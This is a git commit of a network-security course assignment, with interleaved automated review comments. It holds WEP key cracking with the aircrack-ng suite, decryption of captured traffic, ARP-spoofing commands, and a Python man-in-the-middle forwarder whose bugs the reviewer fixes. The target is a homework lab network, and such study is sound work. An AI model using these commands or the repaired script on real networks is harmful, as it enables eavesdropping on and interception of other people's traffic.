authorCamil Staps2015-09-17 20:54:06 +0200
committerCamil Staps2015-09-17 20:54:06 +0200
commitb00f4349fe7cd82524b5dcf9d6853f4ec98fa98f (patch)
tree10a317e74ad96b06e8726aaef660d4b520b8733a
parentAssignment 1 (diff)
Assignment 2
-rw-r--r--.gitignore2
-rw-r--r--netsec-assignment2-S4498062/exercise11
-rw-r--r--netsec-assignment2-S4498062/exercise2/exercise2a22
-rw-r--r--netsec-assignment2-S4498062/exercise2/exercise2b8
-rw-r--r--netsec-assignment2-S4498062/exercise3/exercise3a4
-rw-r--r--netsec-assignment2-S4498062/exercise3/exercise3b72
-rw-r--r--netsec-assignment2-S4498062/exercise3/exercise3c10
-rw-r--r--netsec-assignment2-S4498062/exercise3/exercise3d68
-rw-r--r--netsec-assignment2-S4498062/exercise3/exercise3e10
-rw-r--r--netsec-assignment2-S4498062/exercise4/exercise4a28
-rwxr-xr-xnetsec-assignment2-S4498062/exercise4/mitm.py97
11 files changed, 322 insertions, 0 deletions
diff --git a/.gitignore b/.gitignore
index 4450ceb..082c752 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,4 +1,6 @@
*.pyc
*.tar.gz
assignment*.pdf
+*.cap
+*.pcap
diff --git a/netsec-assignment2-S4498062/exercise1 b/netsec-assignment2-S4498062/exercise1
new file mode 100644
index 0000000..3489e4b
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise1
@@ -0,0 +1 @@
+From that information I would assume some symmetric cipher is used, which would mean every client can encrypt and decrypt and thus also sniff. So, I wouldn't say WPA2-PSK is secure against clients sniffing traffic in the network, regardless of the key used.
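Review bot: The conclusion is right but the reasoning on this line is not quite what WPA2-PSK does: the PSK only serves as the PMK, and each client negotiates its own pairwise transient key (PTK) in the 4-way handshake, so sharing a symmetric cipher does not by itself let one client decrypt another's unicast traffic. What makes sniffing possible is that the PTK is derived from the PMK plus nonces and MAC addresses that are exchanged in the clear, so a client that knows the PSK and has captured the victim's EAPOL handshake (or forced one with a deauthentication) can recompute the victim's PTK. I would rephrase to `a client that knows the PSK and captures the victim's 4-way handshake can derive the victim's per-session key, so WPA2-PSK does not protect clients from each other`.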
diff --git a/netsec-assignment2-S4498062/exercise2/exercise2a b/netsec-assignment2-S4498062/exercise2/exercise2a
new file mode 100644
index 0000000..d076017
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise2/exercise2a
@@ -0,0 +1,22 @@
+ # service NetworkManager stop
+ # airmon-ng start wlan0
+ # airodump-ng mon0
+
+We see the following networks (the target is marked with a +):
+
+ ESSID BSSID CH
+ eduroam
+ ru-guest
+ eduroam-config
+ + NetSec Homework Net (Pol) 48:5B:39:89:8C:10 1
+
+And the clients:
+
+ BSSID STATION PWR Rate Lost Frames Probe
+ 48:5B:39:89:8C:10 00:0F:C9:0C:EE:ED -63 24 -54 96 1410
+ 48:5B:39:89:8C:10 00:0F:C9:0C:F7:8C -65 48 -54 95 960
+ 48:5B:39:89:8C:10 00:0F:C9:0C:F7:93 -71 54 -54 158 1479
+
+The MAC addresses all start with the same 35 bits, so either they were made by
+the same vendor or they were changed manually.
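Review bot: The 35-bit figure is correct arithmetic, but the vendor-identifying part of a MAC address is only the 24-bit OUI (`00:0F:C9`), so "same vendor" is settled by the first three octets alone; the extra 11 shared bits only suggest the adapters came from the same production batch rather than pointing at manual changes. Wireshark's conversation table in exercise3b already resolves these addresses to `Allnet_0c:…`, which confirms the same-vendor reading. I would say `all three share the OUI 00:0F:C9 (Allnet per Wireshark's OUI table), so they are from the same vendor; the further 11 shared bits suggest they were bought as a batch`.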
+
diff --git a/netsec-assignment2-S4498062/exercise2/exercise2b b/netsec-assignment2-S4498062/exercise2/exercise2b
new file mode 100644
index 0000000..5c2cc9c
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise2/exercise2b
@@ -0,0 +1,8 @@
+# airodump-ng -c 1 --bssid 48:5B:39:89:8C:10 -w outputnetsec mon0
+# aircrack-ng --bssid 48:5B:39:89:8C:10 outputnetsec-01.cap
+
+ [..]
+
+ KEY FOUND! [ 37:00:9C:49:21:61:1E:4A:1A:44:6E:2F:20 ]
+ Decrypted correctly: 100%
+
diff --git a/netsec-assignment2-S4498062/exercise3/exercise3a b/netsec-assignment2-S4498062/exercise3/exercise3a
new file mode 100644
index 0000000..e587296
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise3/exercise3a
@@ -0,0 +1,4 @@
+There doesn't seem too much useful because we only see 802.11 protocol stuff.
+Wireshark cannot distinguish other protocols because we didn't give it the key
+to decrypt the encrypted Wi-Fi packets.
+
diff --git a/netsec-assignment2-S4498062/exercise3/exercise3b b/netsec-assignment2-S4498062/exercise3/exercise3b
new file mode 100644
index 0000000..0245301
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise3/exercise3b
@@ -0,0 +1,72 @@
+The comments summary:
+
+Summary created by Wireshark (Git Rev Unknown from unknown)
+
+ File:
+ Name: /.../netsec-assignment2-S4498062/exercise3/outputnetsec-01.cap
+ Length: 161961977 bytes
+ Format: Wireshark/tcpdump/... - pcap
+ Encapsulation: IEEE 802.11 Wireless LAN
+ Packet size limit: 65535 bytes
+
+
+ Time:
+ First packet: 2015-09-11 08:52:12
+ Last packet: 2015-09-11 09:16:57
+ Elapsed: 00:24:45
+
+
+ Capture:
+
+ Unknown interface:
+ Dropped packets: unknown
+ Capture filter: unknown
+ Link type: IEEE 802.11 Wireless LAN
+ Packet size limit 65535 bytes
+
+ Statistics:
+ Packets: 543544
+ Between first and last packet:1485.708 sec
+ Avg. packets/sec: 365.849
+ Avg packet size: 281.974 bytes
+ Bytes: 153265265
+ Avg bytes/sec: 103159.778
+ Avg Mbit/sec: 0.825
+
+In Statistics > Conversations, we see the most active clients:
+
+ "Address A","Address B","Packets","Bytes","Packets A→B","Bytes A→B","Packets A←B","Bytes A←B","Rel Start","Duration","bps A→B","bps A←B"
+ "Allnet_0c:f7:8c","Allnet_0c:f7:93","94165","80983864","55537","77358388","38628","3625476","-0.000004000","1485.6989","416549.48","19522.00"
+ "Allnet_0c:ee:ed","Allnet_0c:f7:93","109921","67395252","65601","6130612","44320","61264640","-0.000003000","1485.7076","33011.14","329888.01"
+ "Allnet_0c:ee:ed","Allnet_0c:f7:8c","8739","999840","4098","479032","4641","520808","0.066556000","1485.1628","2580.36","2805.39"
+ "AsustekC_89:8c:10","IntelCor_25:1b:e2","1080","106920","1080","106920","0","0","6.014339000","1476.0891","579.48","N/A"
+ "AsustekC_89:8c:10","Azurewav_8d:55:58","292","28908","292","28908","0","0","47.326149000","1380.3753","167.54","N/A"
+ "AsustekC_89:8c:10","IntelCor_ed:f2:0b","233","23067","233","23067","0","0","40.717828000","1408.6099","131.01","N/A"
+ "AsustekC_89:8c:10","LgElectr_65:c2:1e","186","18414","186","18414","0","0","196.765954000","1089.9483","135.16","N/A"
+ "AsustekC_89:8c:10","50:a7:2b:79:98:e7","134","13266","134","13266","0","0","1037.606722000","60.9406","1741.50","N/A"
+ "AsustekC_89:8c:10","HonHaiPr_4a:b3:b3","76","7524","76","7524","0","0","21.791043000","1329.0226","45.29","N/A"
+ "IntelCor_a3:19:61","AsustekC_89:8c:10","76","7524","0","0","76","7524","697.795714000","679.1029","N/A","88.63"
+ "IntelCor_e2:52:c0","AsustekC_89:8c:10","48","4752","0","0","48","4752","159.485889000","1289.6303","N/A","29.48"
+ "Azurewav_4a:18:ef","AsustekC_89:8c:10","47","4653","0","0","47","4653","110.878660000","1320.6467","N/A","28.19"
+ "34:fc:ef:a4:20:02","AsustekC_89:8c:10","42","4158","0","0","42","4158","298.310273000","949.5807","N/A","35.03"
+ "AsustekC_89:8c:10","Jolla_01:30:c6","40","3960","40","3960","0","0","569.697859000","197.4624","160.44","N/A"
+ "AsustekC_89:8c:10","SonyMobi_44:eb:da","30","2970","30","2970","0","0","61.584704000","60.0957","395.37","N/A"
+ "SamsungE_34:6b:88","AsustekC_89:8c:10","26","2574","0","0","26","2574","253.012801000","408.3589","N/A","50.43"
+ "AsustekC_89:8c:10","SamsungE_55:3b:c3","23","2277","23","2277","0","0","200.722946000","856.3267","21.27","N/A"
+ "SamsungE_6e:9a:01","AsustekC_89:8c:10","17","1683","0","0","17","1683","11.333827000","304.7486","N/A","44.18"
+ "AsustekC_89:8c:10","SamsungE_41:25:74","13","1287","13","1287","0","0","904.035331000","20.4690","503.00","N/A"
+ "AsustekC_89:8c:10","Apple_35:43:18","9","891","9","891","0","0","259.246274000","501.2417","14.22","N/A"
+ "SimTechn_64:6a:a5","AsustekC_89:8c:10","7","693","0","0","7","693","596.423938000","654.5950","N/A","8.47"
+ "SamsungE_8f:28:47","AsustekC_89:8c:10","7","693","0","0","7","693","1276.488448000","0.0077","N/A","721875.00"
+ "AsustekC_89:8c:10","Apple_9c:bc:42","6","594","6","594","0","0","1376.221698000","0.0159","299395.16","N/A"
+ "Htc_76:de:49","AsustekC_89:8c:10","3","297","0","0","3","297","890.820803000","0.0205","N/A","116009.96"
+ "HuaweiTe_ba:27:00","AsustekC_89:8c:10","3","297","0","0","3","297","1163.479234000","0.0036","N/A","662576.69"
+ "AsustekC_89:8c:10","SamsungE_27:7b:4a","2","198","2","198","0","0","851.540162000","0.0195","81418.66","N/A"
+ "AsustekC_89:8c:10","Broadcast","1","105","1","105","0","0","0.000003000","0.0000","N/A","N/A"
+ "AsustekC_89:8c:10","Motorola_2c:ab:db","1","99","1","99","0","0","1004.081411000","0.0000","N/A","N/A"
+ "AsustekC_89:8c:10","IntelCor_4f:b6:a9","1","99","1","99","0","0","1148.830019000","0.0000","N/A","N/A"
+
+Clearly, Allnet_0c:{f7:8c,ee:ed,f7:93} are the most active.
+
+The protocol hierarchy only shows 802.11 and its data. We're using an encrypted capture, so Wireshark cannot distinguish the different protocols (as explained in exercise3a).
+
diff --git a/netsec-assignment2-S4498062/exercise3/exercise3c b/netsec-assignment2-S4498062/exercise3/exercise3c
new file mode 100644
index 0000000..88b70fd
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise3/exercise3c
@@ -0,0 +1,10 @@
+$ airdecap-ng -l -b 48:5B:39:89:8C:10 -w 37:00:9C:49:21:61:1E:4A:1A:44:6E:2F:20 outputnetsec-01.cap
+Total number of packets read 543544
+Total number of WEP data packets 200052
+Total number of WPA data packets 0
+Number of plaintext data packets 0
+Number of decrypted WEP packets 200052
+Number of corrupted WEP packets 0
+Number of decrypted WPA packets 0
+
+Now we use the decrypted capture, so Wireshark is able to distinguish other protocols than 802.11.
diff --git a/netsec-assignment2-S4498062/exercise3/exercise3d b/netsec-assignment2-S4498062/exercise3/exercise3d
new file mode 100644
index 0000000..26dea2d
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise3/exercise3d
@@ -0,0 +1,68 @@
+The comments summary:
+
+ Summary created by Wireshark (Git Rev Unknown from unknown)
+
+ File:
+ Name: /.../netsec-assignment2-S4498062/exercise3/outputnetsec-01-dec.cap
+ Length: 140897136 bytes
+ Format: Wireshark/tcpdump/... - pcap
+ Encapsulation: IEEE 802.11 Wireless LAN
+ Packet size limit: 65535 bytes
+
+
+ Time:
+ First packet: 2015-09-11 08:52:12
+ Last packet: 2015-09-11 09:16:57
+ Elapsed: 00:24:45
+
+
+ Capture:
+
+ Unknown interface:
+ Dropped packets: unknown
+ Capture filter: unknown
+ Link type: IEEE 802.11 Wireless LAN
+ Packet size limit 65535 bytes
+
+ Statistics:
+ Packets: 200052
+ Between first and last packet:1485.708 sec
+ Avg. packets/sec: 134.651
+ Avg packet size: 688.302 bytes
+ Bytes: 137696296
+ Avg bytes/sec: 92680.617
+ Avg Mbit/sec: 0.741
+
+The IP conversations:
+
+ "Address A","Address B","Packets","Bytes","Packets A→B","Bytes A→B","Packets A←B","Bytes A←B","Rel Start","Duration","bps A→B","bps A←B"
+ "192.168.84.40","192.168.84.79","4743","550188","2791","323756","1952","226432","0.000000000","1485.2227","1743.88","1219.65"
+ "192.168.84.51","192.168.84.68","97598","57695108","61316","5156724","36282","52538384","-0.000003000","1485.7076","27767.10","282900.27"
+ "192.168.84.10","192.168.84.62","85260","78089584","51881","75285124","33379","2804460","-0.000004000","1485.6989","405385.64","15101.10"
+ "192.168.84.10","192.168.84.47","5570","646120","2788","323408","2782","322712","0.066556000","1485.1628","1742.07","1738.33"
+ "192.168.84.10","192.168.84.60","4682","543112","2721","315636","1961","227476","0.975936000","1484.1761","1701.34","1226.14"
+ "192.168.84.10","192.168.84.56","1832","150164","919","66168","913","83996","1.014845000","1482.2693","357.12","453.34"
+
+Conversation .10 and .62:
+
+ These clients only use TCP. The data seems to be hexadecimal ascii
+ characters. I did not convert that to see what they're sending.
+
+Conversation .51 and .68:
+
+ This is similar to the one above.
+
+The protocol hierarchy looks more interesting now (percentages are given in %
+packets):
+
+ - There's some ARP messages (0.18%)
+ - But mostly IP (99.82%)
+ - Of which most are TCP (92.32%)
+ - But also some ICMP (7.5%)
+
+NOTE:
+As it turns out, there was something wrong with the network when I sniffed. Another student had the same problem, but retrying later gave
+him UDP packets with something like "Insert your student number here". I did not have the time to sniff again and look at the details again.
+As a result, I didn't understand what was the point of exercise 4b (see note there as well).
+As a proof, I can send you the cap file. Because of its size I will only do that on request (info@camilstaps.nl).
+
diff --git a/netsec-assignment2-S4498062/exercise3/exercise3e b/netsec-assignment2-S4498062/exercise3/exercise3e
new file mode 100644
index 0000000..e195f2c
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise3/exercise3e
@@ -0,0 +1,10 @@
+In the Conversations > TCP view, we see many very short (few packets)
+conversations between 192.168.84.56 (several ports) and 192.168.86.10:21057. I
+would guess then that .56 is being rejected by .10.
+Using the filter
+
+ ip.addr==192.168.84.56 and ip.addr==192.168.84.10
+
+this is confirmed. We see many TCP packets from .56 with SYN, but .10
+continuously repeats with RST, ACK.
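Review bot: The address on the second line, `192.168.86.10:21057`, does not match the filter and the rest of the write-up, which use `192.168.84.10`; this looks like a typo and should read `192.168.84.10:21057`. A SYN answered with RST,ACK is also the normal TCP reply for a port with no listener, not necessarily an active rejection by a firewall (a firewall would typically drop silently or answer with ICMP unreachable), so "rejected" is stronger than the evidence supports; `.10 answers every SYN to port 21057 with RST,ACK, i.e. nothing is listening there (or a reject rule sends a RST)` states what the capture shows. The 7.5% ICMP noted in exercise3d might be worth checking under the same filter for related unreachable messages.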
+
diff --git a/netsec-assignment2-S4498062/exercise4/exercise4a b/netsec-assignment2-S4498062/exercise4/exercise4a
new file mode 100644
index 0000000..016e211
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise4/exercise4a
@@ -0,0 +1,28 @@
+ # echo 1 > /proc/sys/net/ipv4/ip_forward
+ # ifconfig wlan0 down
+ # iwconfig wlan0 mode managed
+ # iwconfig wlan0 essid "NetSec Homework Net (Pol)"
+ # iwconfig wlan0 ap 48:5B:39:89:8C:10
+ # iwconfig wlan0 key 37:00:9C:49:21:61:1E:4A:1A:44:6E:2F:20
+ # ifconfig wlan0 up
+ # ifconfig wlan0 192.168.84.100
+
+You should *not* run Wireshark with root rights, but rather add yourself to the
+wireshark group (at least, that's what it told me). In any case, the pings do
+show up.
+
+I'm going to perform MITM between .10 and .62:
+
+ # arpspoof -t 192.168.84.10 192.168.84.62
+ # arpspoof -t 192.168.84.62 192.168.84.10
+
+For some reason in Wireshark I then see pings between .60 (and .100 and .100)
+and .10 (why .60 instead of .62?).
+
+We're seeing two sets because we're playing MITM:
+
+ .10 <-----------> .100 (us) <------------> .62
+ first set second set
+
+All packets have to be sent twice for this to work.
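Review bot: The two `arpspoof` invocations each run in the foreground, so as written the second never starts until the first is stopped; they need to run concurrently (two terminals or `&`), and passing `-i wlan0` avoids arpspoof picking a different default interface. The unexplained pings between .60 and .10 could be checked rather than guessed at: the Wireshark filter `arp.opcode == 2` shows which hosts received forged replies and from which MAC, and `arp -a` on a victim shows whether its entry for .10 now points to your machine. Minor hygiene: `iwconfig wlan0 key ...` records the WEP key in root's shell history; since the key is already written down in exercise2b this is only something to clear afterwards.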
+
diff --git a/netsec-assignment2-S4498062/exercise4/mitm.py b/netsec-assignment2-S4498062/exercise4/mitm.py
new file mode 100755
index 0000000..3d4fdb8
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise4/mitm.py
@@ -0,0 +1,97 @@
+#!/usr/bin/env python3
+
+# NOTE: as explained in 3d, I was working on this when something was wrong with
+# the network, and as a result, didn't get the point of this exercise.
+# This code does *not* work. I am quite confident I could get it to work, but
+# don't have the time to redo everything.
+
+import socket
+import struct
+import math
+
+mac_1 = b'\x00\x0f\xc9\x0c\xee\xed'
+mac_2 = b'\x00\x0f\xc9\x0c\xf7\x93'
+
+def parse_tcp(packet):
+ header_length = packet[12] * 4
+ header = packet[:14] # We don't care about the variable length options
+ data = packet[header_length:]
+ src_port, dst_port, seqn, ackn, flags = struct.unpack("!HHIIxB", header)
+ return src_port, dst_port, seqn, ackn, flags, data
+
+def parse_udp(packet):
+ header_length = 8
+ header = packet[:header_length]
+ data = packet[header_length:]
+ src_port, dst_port, data_len, checksum = struct.unpack("!HHHH", header)
+ return src_port, dst_port, data_len, data, checksum
+
+def parse_ip(packet):
+ header_length_in_bytes = (packet[0] & 0x0f) * 4
+ header = packet[:20]
+ data = packet[header_length_in_bytes:]
+ length, protocol, src, dst = struct.unpack("!xxHxxxxxBxx4s4s", header)
+ header = {'length': length,
+ 'protocol': protocol,
+ 'source': src,
+ 'destination': dst}
+ return header_length_in_bytes, header, data
+
+def format_ip(addr):
+ return '.'.join('%d'%i for i in addr)
+
+def parse_eth(packet):
+ if (packet[13:14] == b'\x81\x00'):
+ dst, src, typecode = struct.unpack("!6s6sxxxx2s", packet[:18])
+ data = packet[18:]
+ else:
+ dst, src, typecode = struct.unpack("!6s6s2s", packet[:14])
+ data = packet[14:]
+ return dst, src, typecode, data
+
+def format_mac(addr):
+ return ':'.join('%02x'%i for i in addr)
+
+def main():
+ s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
+ while True:
+ raw, address = s.recvfrom(2 ** 16 - 1)
+
+ eth_dst, eth_src, eth_type, eth_data = parse_eth(raw)
+
+ if eth_type == b'\x08\x00': # IP
+ print("ETH: {} --> {} ({})".format(
+ format_mac(eth_dst), format_mac(eth_src), eth_type))
+
+ ip_header_len, ip_header, ip_payload = parse_ip(eth_data)
+ print("IP: {} --> {} ({:04x})".format(
+ format_ip(ip_header['source']),
+ format_ip(ip_header['destination']),
+ ip_header['protocol']))
+
+ if ip_header['protocol'] == 0x11: # UDP
+ src_port, dst_port, _, udp_data, _ = parse_udp(ip_payload)
+ print("UDP: :{} --> :{}".format(
+ src_port, dst_port))
+ elif ip_header['protocol'] == 0x06: # TCP
+ src_port, dst_port, seqn, ackn, flags, tcp_data = parse_tcp(
+ ip_payload)
+ print("TCP: :{} --> :{} / SEQ:{} ACK:{} ({:#02x})".format(
+ src_port, dst_port, seqn, ackn, flags))
+
+ if eth_src == mac_1:
+ eth_dst = mac_2
+ s.sendto(eth_dst + eth_src + eth_type + eth_data, ip_header['destination'])
+ print("Forwarded to {}".format(mac_2))
+ elif eth_src == mac_2:
+ eth_dst = mac_1
+ s.sendto(eth_dst + eth_src + eth_type + eth_data, ip_header['destination'])
+ print("Forwarded to {}".format(mac_1))
+
+
+
+ print()
+
+if __name__ == "__main__":
+ main()
+
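Review bot: Beyond the author's own caveat that it does not work, there are four concrete defects that would stop this even on a healthy network. `s.sendto(..., ip_header['destination'])` passes a 4-byte IP as the address of an AF_PACKET socket, which needs an `(ifname, proto)` tuple (the interface name is the first element of the `address` tuple that `recvfrom` returns), so every forward raises. `header_length = packet[12] * 4` in parse_tcp uses the whole byte, but the data offset is only its high nibble, so `data` starts far past the real payload; and `packet[13:14] == b'\x81\x00'` in parse_eth compares a one-byte slice with a two-byte value and is never true, so the 802.1Q branch is dead (`packet[12:14]` was meant). Finally, an ETH_P_ALL packet socket also delivers the frames this script itself sends (pkttype `PACKET_OUTGOING`), and since the forwarded frame keeps `eth_src == mac_1` it is matched and re-sent on each pass, so outgoing frames must be skipped before parsing. The `ETH:` print also lists dst before src under a `-->` arrow, which reads backwards.
```python
def parse_tcp(packet):
    header_length = (packet[12] >> 4) * 4  # data offset is the high nibble, in 32-bit words
    # … unchanged: header/data split and unpack …

def parse_eth(packet):
    if packet[12:14] == b'\x81\x00':  # 802.1Q TPID sits at bytes 12-13
    # … unchanged: VLAN / plain unpack …

def main():
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
    while True:
        raw, address = s.recvfrom(2 ** 16 - 1)
        ifname, _, pkttype, _, _ = address
        if pkttype == socket.PACKET_OUTGOING:
            continue  # our own forwarded frames come back on this socket; don't re-forward them
        # … unchanged: parsing and printing …
        if eth_src == mac_1:
            s.sendto(mac_2 + eth_src + eth_type + eth_data, (ifname, 0))
        elif eth_src == mac_2:
            s.sendto(mac_1 + eth_src + eth_type + eth_data, (ifname, 0))
```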